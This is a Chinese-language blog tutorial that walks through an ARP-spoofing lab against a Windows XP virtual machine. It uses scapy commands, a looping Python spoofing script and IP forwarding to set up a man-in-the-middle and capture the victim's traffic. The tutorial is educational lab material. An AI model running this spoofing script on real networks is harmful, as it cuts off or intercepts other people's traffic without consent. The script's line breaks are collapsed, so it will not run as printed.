ARP协议详解(3)--arp欺骗

不知道为什么今天翻看csdn草稿箱发现在大一下写过这个没有发出来，也不知道为什么，忘了

文章目录

实验环境
实践

讲了那么理论知识，现在让我们来实践一下吧

实验环境

kali(欺骗方)–192.168.43.60 --00:0c:29:e1:76:5f
xp(受害者)–192.168.43.62-- 00-0C-29-AE-EB-6B
网关–192.168.43.1-- 88-f5-6e-f2-b5-73

需要用到的工具
scapy
wireshark
widlepacket(wireshark也可以，需要安装在xp上)

实践

由于arp欺骗可以把目标arp缓存里面任意一个非静态的IP绑定的MAC地址修改，所以这里我们就直接修改网关的MAC地址
首先查看一下xp虚拟机的arp缓存

进入scapy

scapy

查看我们需要配置的ARP数据包

 ARP().display()

可以修改的有
op= who-has
可以修改成1(who-has，arp请求包)2(i am at,arp回包用来告诉我们的mac地址)
hwsrc= 00:0c:29:e1:76:5f(来源mac)
psrc= 192.168.43.60(来源ip)
hwdst= 00:00:00:00:00:00(目标mac如果是请求包不需要修改，如果是回包需要设置)
pdst= 0.0.0.0(这个是一定要设置…不然谁知道你要发给谁…)

第一步，查询受害者的MAC地址

a=sr1(ARP(pdst="192.168.443.62"))

sr1()用来发送数据包，scapy里所有的数据包发送都需要用到这个函数，ARP()里面配置我们需要设置的选项，然后这个发送数据包的相应保存到a中

a.display()

查看回包

第二部，发送数据包欺骗受害者网关的MAC地址是我

a=sr1(ARP(pdst="192.168.43.62",hwdst="00:0c:29:ae:eb:6b",op=2,psrc="192.168.43.1"))

目标ip和目标mac地址是我们之前查询的，op修改为2,这是发送回复包，psrc修改成我们要欺骗成为的ip地址

为什么这个会有效呢？
这个也是跟ARP协议设定有关
ARP协议构想是比较好，你请求了，如果请求的是我，我就回包告诉你，这样看似不错而且安全，但实际上有很大的缺陷。

基于传闻的协议
没有请求的回复有效

如果你没有请求，我也发了个回复包，你看回复的IP是你，然后你就会去乖乖的对比本地的arp缓存，然后我发的是什么你就信任什么，这就为攻击者提供了很大的便利
所以在这里，不管受害者有没有请求要去查询ARP,我们发的is-at包他都会去接受并且相信，然后修改本地的ARP缓存
效果如下

注意:这个时候由于我们发的是is-at包，没有回包，所以scapy会卡在这里等待回报，我们看到finished sending就可以大胆ctrl+c结束掉，或者设置timeout即可

a=sr1(ARP(pdst="192.168.43.62",hwdst="00:0c:29:ae:eb:6b",op=2,psrc="192.168.43.1"),timeout=1)

第一次学的时候我以为到这就结束了，但实际上还没这么简单
大概过了一会，我们再去查看xp的arp缓存，发现
又恢复到以前了，这是为什么呢?

第一次is-at包就是我们欺骗的包，xp相信了并且修改了，可没过多久，讨厌的网关又自作多情，跑出来问，192.168.43.62你在哪，你跑了吗?接收到消息的受害者立马回复，于是乎二者更新了ARP缓存

所以ARP欺骗要注意的第一点就是
一定要持续发包
才可以淹没正常的网关ARP请求，防止中途又被碍事的网关缴获了

第三步，持续发包欺骗受害者
这里就需要用到脚本啦
简单的python小程序

vim test.py

#! /usr/bin/python
# -*- coding: utf-8 -*-
# create by azraelxuemoimport logging
import subprocess
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *if len(sys.argv)==1 or '-h' in sys.argv or '--help' in sys.argv:print "脚本的使用说明"print "这个脚本用来欺骗指定ip"print "-h --help 打印这份说明"print "-t 指定需要欺骗的目标"sys.exit()if '-t' in sys.argv:targetip=str(sys.argv[2])localmac=subprocess.check_output("ifconfig eth0 |grep 'ether'|cut -d 'r' -f 2|cut -d 't' -f 1",shell=True).strip()prefix=targetip.split('.')[0]+'.'+targetip.split('.')[1]+'.'+targetip.split('.')[2]+'.' fakeip=prefix+str(1)a1=sr1(ARP(pdst=targetip),verbose=0)targetmac=a1.hwdstwhile(1):answer=sr1(ARP(op=2,hwsrc=localmac,psrc=fakeip,pdst=targetip,hwdst=targetmac),timeout=1,verbose=0)try:if answer==None:print "正在arp欺骗"except:pass

赋予执行权限

chmod +x test.py
./test.py -t 192.168.43.62

可以看到，洪水般的is-at包
可以看到xp又被骗了

这个时候可以看到xp上不了网了
为什么呢?
xp这个憨憨以为网关是我们，就把包通通甩给了我们，但我们又不是网关，又不会帮他转发上网，所以xp就断网啦（这里dns的原因是xp并不知道baidu对应的 ip是多少，所以他先进行了dns查询)
由于我们没开转发，所以他连网关也ping不通，因为icmp是3层协议，是看IP回复，虽然他发给了我们，但由于IP不对，我们也无法回包

第四步，包转发
既然我们实现了arp欺骗了，并且可以获取到xp发送的数据包了，但由于xp不能正常上网，我们也截获不到有用的信息，所以我们现在就需要成为中间人，把xp上网的流量转发给网关，然后网关处理完了以后再返回给我们，这样有价值的信息就到我们手上啦

kali默认关闭转发功能

cat  /proc/sys/net/ipv4/ip_forward
0

开启转发

echo 1 >  /proc/sys/net/ipv4/ip_forward

这个时候可以看到我们的受害者ping通了网关